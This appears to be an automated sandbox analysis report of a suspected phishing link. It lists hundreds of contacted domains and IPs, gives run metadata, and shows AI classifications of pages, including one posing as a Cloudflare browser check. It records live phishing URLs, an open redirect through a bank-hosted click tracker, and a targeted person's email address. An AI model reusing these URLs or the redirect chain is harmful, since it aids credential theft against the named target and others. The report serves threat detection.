                                                                                                                            pixel.tapad.com
                                                                                                                            34.111.113.62
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              a.nel.cloudflare.com
                                                                                                                              35.190.80.1
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                pippio.com
                                                                                                                                107.178.254.65
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  ssp.ads.betweendigital.com
                                                                                                                                  188.42.34.65
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    sync.ipredictive.com
                                                                                                                                    54.152.57.193
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      wnsrvbjmeprtfrnfx.ay.delivery
                                                                                                                                      172.67.149.20
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        prod-rotation-v2.guce.aws.oath.cloud
                                                                                                                                        52.211.83.243
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          s.amazon-adsystem.com
                                                                                                                                          98.82.156.107
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            aax-eu.amazon-adsystem.com
                                                                                                                                            67.220.228.202
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              metrics.brightcove.com
                                                                                                                                              35.244.232.184
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                imgsync-amsfpairbc.pubmnet.com
                                                                                                                                                198.47.127.18
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  ipac.ctnsnet.com
                                                                                                                                                  35.186.193.173
                                                                                                                                                  truefalse
                                                                                                                                                    unknown
                                                                                                                                                    geo-atsv2.media.g03.yahoodns.net
                                                                                                                                                    188.125.72.139
                                                                                                                                                    truefalse
                                                                                                                                                      unknown
                                                                                                                                                      ssp-sync.nl3.vip.prod.criteo.com
                                                                                                                                                      178.250.1.7
                                                                                                                                                      truefalse
                                                                                                                                                        unknown
                                                                                                                                                        outspot2-ams.adx.opera.com
                                                                                                                                                        82.145.213.8
                                                                                                                                                        truefalse
                                                                                                                                                          unknown
                                                                                                                                                          aws-bid-global.ybp.gysm.yahoodns.net
                                                                                                                                                          34.250.230.61
                                                                                                                                                          truefalse
                                                                                                                                                            unknown
                                                                                                                                                            ib.anycast.adnxs.com
                                                                                                                                                            185.89.210.212
                                                                                                                                                            truefalse
                                                                                                                                                              unknown
                                                                                                                                                              dsp.nrich.ai
                                                                                                                                                              51.255.68.171
                                                                                                                                                              truefalse
                                                                                                                                                                unknown
                                                                                                                                                                edge.gycpi.b.yahoodns.net
                                                                                                                                                                87.248.119.252
                                                                                                                                                                truefalse
                                                                                                                                                                  unknown
                                                                                                                                                                  uipus.semasio.net
                                                                                                                                                                  50.57.31.206
                                                                                                                                                                  truefalse
                                                                                                                                                                    unknown
                                                                                                                                                                    v-bnmvrl70mr.wc.yahoodns.net
                                                                                                                                                                    212.82.116.200
                                                                                                                                                                    truefalse
                                                                                                                                                                      unknown
                                                                                                                                                                      ws.rqtrk.eu
                                                                                                                                                                      57.129.18.113
                                                                                                                                                                      truefalse
                                                                                                                                                                        unknown
                                                                                                                                                                        eu-eb2.3lift.com
                                                                                                                                                                        13.248.245.213
                                                                                                                                                                        truefalse
                                                                                                                                                                          unknown
                                                                                                                                                                          cadmus2.script.ac
                                                                                                                                                                          104.18.23.145
                                                                                                                                                                          truefalse
                                                                                                                                                                            unknown
                                                                                                                                                                            9wetjda.niavereinho.ru
                                                                                                                                                                            188.114.97.3
                                                                                                                                                                            truefalse
                                                                                                                                                                              unknown
                                                                                                                                                                              ybar-bnmvrl70mrreport.wc.yahoodns.net
                                                                                                                                                                              98.136.127.9
                                                                                                                                                                              truefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                hbopenbid-ams.pubmnet.com
                                                                                                                                                                                185.64.189.112
                                                                                                                                                                                truefalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  livepixel-production.bln.liveintent.com
                                                                                                                                                                                  44.195.199.143
                                                                                                                                                                                  truefalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    me-ycpi-cf-www.g06.yahoodns.net
                                                                                                                                                                                    87.248.119.252
                                                                                                                                                                                    truefalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      sync.crwdcntrl.net
                                                                                                                                                                                      54.76.166.236
                                                                                                                                                                                      truefalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        rtb-csync-euw1.smartadserver.com
                                                                                                                                                                                        89.149.192.74
                                                                                                                                                                                        truefalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          cdnjs.cloudflare.com
                                                                                                                                                                                          104.17.24.14
                                                                                                                                                                                          truefalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            cm.g.doubleclick.net
                                                                                                                                                                                            142.250.184.194
                                                                                                                                                                                            truefalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              eu-tlx.3lift.com
                                                                                                                                                                                              3.124.64.248
                                                                                                                                                                                              truefalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                ds-pr-bh.ybp.gysm.yahoodns.net
                                                                                                                                                                                                52.30.164.17
                                                                                                                                                                                                truefalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  sync.1rx.io
                                                                                                                                                                                                  46.228.174.117
                                                                                                                                                                                                  truefalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    spug-amsfpairbc.pubmnet.com
                                                                                                                                                                                                    198.47.127.20
                                                                                                                                                                                                    truefalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloud
                                                                                                                                                                                                      3.161.82.22
                                                                                                                                                                                                      truefalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        us-u.openx.net
                                                                                                                                                                                                        35.244.159.8
                                                                                                                                                                                                        truefalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          https://9wetjda.niavereinho.ru/QTnArt4/#DHolly.hebert@firstontario.comtrue
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://firstontario.athrikasih.com/cloudflare-antibot/#Holly.hebert+firstontario.comfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://www.yahoo.com/false
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://login.yahoo.com/?.lang=en-US&src=homepage&.done=https%3A%2F%2Fwww.yahoo.com%2F&pspid=2023538075&activity=ybar-signinfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                  37.157.6.254
                                                                                                                                                                                                                  unknownDenmark
                                                                                                                                                                                                                  198622ADFORMDKfalse
                                                                                                                                                                                                                  52.211.83.243
                                                                                                                                                                                                                  prod-rotation-v2.guce.aws.oath.cloudUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  35.214.216.120
                                                                                                                                                                                                                  envoy-hl.envoy-csync.core-002-ew4.ov1o.comUnited States
                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                  151.101.2.27
                                                                                                                                                                                                                  dualstack.brightcove.map.fastly.netUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  74.6.160.107
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                  74.6.160.106
                                                                                                                                                                                                                  osmxq05cx.wc.06yahoo.comUnited States
                                                                                                                                                                                                                  36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                  3.160.150.30
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  34.95.69.49
                                                                                                                                                                                                                  i.clean.ggUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  104.21.34.46
                                                                                                                                                                                                                  tizlpdgtz5pneyh34h3ymwgjoq8v30ywsdaz1rkwez9asac8a7c1dxyoy.tubeawelm.ruUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  88.221.169.246
                                                                                                                                                                                                                  unknownEuropean Union
                                                                                                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                  63.215.202.172
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  41041VCLK-EU-SEfalse
                                                                                                                                                                                                                  212.82.100.137
                                                                                                                                                                                                                  ds-global3.l7.search.ystg1.b.yahoo.comUnited Kingdom
                                                                                                                                                                                                                  34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                  35.71.131.137
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  237MERIT-AS-14USfalse
                                                                                                                                                                                                                  204.79.197.237
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  151.101.193.44
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  35.214.199.88
                                                                                                                                                                                                                  dorpat.geo.iponweb.netUnited States
                                                                                                                                                                                                                  19527GOOGLE-2USfalse
                                                                                                                                                                                                                  151.101.130.49
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  87.248.114.80
                                                                                                                                                                                                                  ybar-cn0b8nwv37report.wc.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                  43428YAHOO-ULSGBfalse
                                                                                                                                                                                                                  216.58.206.42
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  172.217.18.2
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  52.16.68.25
                                                                                                                                                                                                                  dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  151.101.1.44
                                                                                                                                                                                                                  tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  107.178.254.65
                                                                                                                                                                                                                  pippio.comUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  52.7.94.99
                                                                                                                                                                                                                  idx.cph.liveintent.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                  151.101.65.44
                                                                                                                                                                                                                  tsdtocl.comUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  142.250.185.230
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  172.67.149.20
                                                                                                                                                                                                                  wnsrvbjmeprtfrnfx.ay.deliveryUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  212.82.100.140
                                                                                                                                                                                                                  ds-ats.member.g02.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                  34010YAHOO-IRDGBfalse
                                                                                                                                                                                                                  34.249.224.85
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  151.101.2.49
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  208.93.169.131
                                                                                                                                                                                                                  am1-direct-bgp.contextweb.comUnited States
                                                                                                                                                                                                                  26228SERVEPATHUSfalse
                                                                                                                                                                                                                  216.58.206.36
                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  87.248.119.251
                                                                                                                                                                                                                  edge-prebid-cdn.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                  87.248.119.252
                                                                                                                                                                                                                  edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                  203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                  89.149.192.74
                                                                                                                                                                                                                  rtb-csync-euw1.smartadserver.comNetherlands
                                                                                                                                                                                                                  60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                  52.48.103.3
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  69.147.86.186
                                                                                                                                                                                                                  v-a5qcx9czh0.wc.yahoodns.netUnited States
                                                                                                                                                                                                                  14776INKTOMI-LAWSONUSfalse
                                                                                                                                                                                                                  54.175.124.176
                                                                                                                                                                                                                  sync.srv.stackadapt.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  142.250.186.138
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  103.87.40.74
                                                                                                                                                                                                                  webhosting.icicidirect.comIndia
                                                                                                                                                                                                                  17436ICICIBANK-ASICICIBANKLtdBankingMumbaiINfalse
                                                                                                                                                                                                                  178.250.1.9
                                                                                                                                                                                                                  widget.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                  178.250.1.7
                                                                                                                                                                                                                  ssp-sync.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                  18.244.18.122
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  178.250.1.3
                                                                                                                                                                                                                  static.nl3.vip.prod.criteo.netFrance
                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                  52.49.236.173
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  63.215.202.169
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  41041VCLK-EU-SEfalse
                                                                                                                                                                                                                  142.250.181.226
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  34.102.163.6
                                                                                                                                                                                                                  ad.mrtnsvr.comUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  104.22.50.98
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  34.250.181.32
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  46.228.174.117
                                                                                                                                                                                                                  sync.1rx.ioUnited Kingdom
                                                                                                                                                                                                                  56396TURNGBfalse
                                                                                                                                                                                                                  34.252.4.83
                                                                                                                                                                                                                  match.prod.bidr.ioUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  13.32.27.11
                                                                                                                                                                                                                  d1giprow6b9psh.cloudfront.netUnited States
                                                                                                                                                                                                                  7018ATT-INTERNET4USfalse
                                                                                                                                                                                                                  103.67.200.72
                                                                                                                                                                                                                  1.cpm.ak-is2.netUnited States
                                                                                                                                                                                                                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                  18.184.119.72
                                                                                                                                                                                                                  match-eu-central-1-ecs.sharethrough.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  3.225.24.105
                                                                                                                                                                                                                  zeta-ssp-385516103.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  104.102.34.86
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                  172.67.197.235
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  2.23.197.190
                                                                                                                                                                                                                  unknownEuropean Union
                                                                                                                                                                                                                  1273CWVodafoneGroupPLCEUfalse
                                                                                                                                                                                                                  69.173.146.5
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  26667RUBICONPROJECTUSfalse
                                                                                                                                                                                                                  54.77.21.133
                                                                                                                                                                                                                  euw-ice.360yield.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  198.47.127.20
                                                                                                                                                                                                                  spug-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                  108.138.7.80
                                                                                                                                                                                                                  d9z32kqpe67oo.cloudfront.netUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  18.158.122.115
                                                                                                                                                                                                                  crb.kargo.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  3.124.64.248
                                                                                                                                                                                                                  eu-tlx.3lift.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  54.152.57.193
                                                                                                                                                                                                                  sync.ipredictive.comUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  81.17.55.109
                                                                                                                                                                                                                  unknownNetherlands
                                                                                                                                                                                                                  24588NETPROVODOV-ASRUfalse
                                                                                                                                                                                                                  99.81.1.14
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  180.222.116.76
                                                                                                                                                                                                                  ybar-mcdn-report.wc.yahoodns.netIndia
                                                                                                                                                                                                                  45230UBERGROUP-AS-NZUberGroupLimitedNZfalse
                                                                                                                                                                                                                  180.222.116.77
                                                                                                                                                                                                                  v-cn0b8nwv37.wc.yahoodns.netIndia
                                                                                                                                                                                                                  45230UBERGROUP-AS-NZUberGroupLimitedNZfalse
                                                                                                                                                                                                                  3.75.62.37
                                                                                                                                                                                                                  ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  104.18.95.41
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  3.225.235.198
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  104.18.36.155
                                                                                                                                                                                                                  ssum.casalemedia.comUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  13.107.42.14
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                  198.47.127.19
                                                                                                                                                                                                                  pugm-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                  198.47.127.18
                                                                                                                                                                                                                  imgsync-amsfpairbc.pubmnet.comUnited States
                                                                                                                                                                                                                  62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                  178.250.1.56
                                                                                                                                                                                                                  in-ftd-65.nl3.vip.prod.criteo.comFrance
                                                                                                                                                                                                                  44788ASN-CRITEO-EUROPEFRfalse
                                                                                                                                                                                                                  142.250.184.238
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  18.197.252.142
                                                                                                                                                                                                                  ActivationEdge-activation-1631408035.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  172.217.16.195
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  34.91.62.186
                                                                                                                                                                                                                  um.simpli.fiUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  82.145.213.8
                                                                                                                                                                                                                  outspot2-ams.adx.opera.comUnited Kingdom
                                                                                                                                                                                                                  39832NO-OPERANOfalse
                                                                                                                                                                                                                  52.214.203.240
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  3.71.149.231
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  66.218.84.43
                                                                                                                                                                                                                  5k2ttewqa.wc.06yahoo.comUnited States
                                                                                                                                                                                                                  26101YAHOO-3USfalse
                                                                                                                                                                                                                  188.125.94.200
                                                                                                                                                                                                                  unknownUnited Kingdom
                                                                                                                                                                                                                  10310YAHOO-1USfalse
                                                                                                                                                                                                                  104.18.94.41
                                                                                                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  172.64.151.101
                                                                                                                                                                                                                  ssum-sec.casalemedia.comUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  124.146.153.167
                                                                                                                                                                                                                  unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                                                                                                                                                                                                                  18.244.18.27
                                                                                                                                                                                                                  sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  98.136.127.9
                                                                                                                                                                                                                  ybar-bnmvrl70mrreport.wc.yahoodns.netUnited States
                                                                                                                                                                                                                  36646YAHOO-NE1USfalse
                                                                                                                                                                                                                  195.5.165.20
                                                                                                                                                                                                                  core.iprom.netSlovenia
                                                                                                                                                                                                                  44968IPROM-ASSIfalse
                                                                                                                                                                                                                  151.101.194.137
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                  172.64.146.152
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  3.161.82.22
                                                                                                                                                                                                                  consent-cmp-prod.dcs-core-dmp-prd.aws.oath.cloudUnited States
                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                  74.6.231.20
                                                                                                                                                                                                                  yahoo.comUnited States
                                                                                                                                                                                                                  36646YAHOO-NE1USfalse
                                                                                                                                                                                                                  35.186.253.211
                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  34.111.113.62
                                                                                                                                                                                                                  pixel.tapad.comUnited States
                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1526006
                                                                                                                                                                                                                  Start date and time:2024-10-04 16:37:45 +02:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                  Sample URL:https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  Analysis Mode:stream
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Detection:SUS
                                                                                                                                                                                                                  Classification:sus23.phis.win@72/290@642/547
                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 172.217.16.195, 66.102.1.84, 216.58.206.78, 34.104.35.123
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • VT rate limit hit for: https://webhosting.icicidirect.com/TDSCERT/UserResponseClickLogs.jsp?ID=DMAIL_03-JUL-2023_457530_48792&type=GETINSTANTEMICARDNOW&url=https://Firstontario.athrikasih.com/cloudflare-antibot#Holly.hebert+firstontario.com
                                                                                                                                                                                                                  InputOutput
                                                                                                                                                                                                                  URL: https://firstontario.athrikasih.com/cloudflare-antibot/#Holly.hebert+firstontario.com Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":[],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://firstontario.athrikasih.com/cloudflare-antibot/#Holly.hebert+firstontario.com Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":[],
                                                                                                                                                                                                                  "contains_trigger_text":false,
                                                                                                                                                                                                                  "trigger_text":"",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://9wetjda.niavereinho.ru/QTnArt4/#DHolly.hebert@firstontario.com Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["CLOUDFLARE"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Running checks on your browser for safe access.",
                                                                                                                                                                                                                  "prominent_button_name":"unknown",
                                                                                                                                                                                                                  "text_input_field_labels":"unknown",
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["yahoo!",
                                                                                                                                                                                                                  "Globi"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
                                                                                                                                                                                                                  URL: https://www.yahoo.com/ Model: jbxai
                                                                                                                                                                                                                  {
                                                                                                                                                                                                                  "brand":["Yahoo",
                                                                                                                                                                                                                  "Trump",
                                                                                                                                                                                                                  "FEMA",
                                                                                                                                                                                                                  "Bruce Springsteen",
                                                                                                                                                                                                                  "Biltmore Estate",
                                                                                                                                                                                                                  "Jobs Report",
                                                                                                                                                                                                                  "Hurricane Kirk",
                                                                                                                                                                                                                  "Longshoreman Sun",
                                                                                                                                                                                                                  "Russia-Ukraine",
                                                                                                                                                                                                                  "Seth Altman",
                                                                                                                                                                                                                  "Milwaukee Brew",
                                                                                                                                                                                                                  "Port Workers"],
                                                                                                                                                                                                                  "contains_trigger_text":true,
                                                                                                                                                                                                                  "trigger_text":"Trump accused Jack Smith of election interference,
                                                                                                                                                                                                                   but judge made new filing public",
                                                                                                                                                                                                                  "prominent_button_name":"Sign in",
                                                                                                                                                                                                                  "text_input_field_labels":["unknown"],
                                                                                                                                                                                                                  "pdf_icon_visible":false,
                                                                                                                                                                                                                  "has_visible_captcha":false,
                                                                                                                                                                                                                  "has_urgent_text":false,
                                                                                                                                                                                                                  "has_visible_qrcode":false}
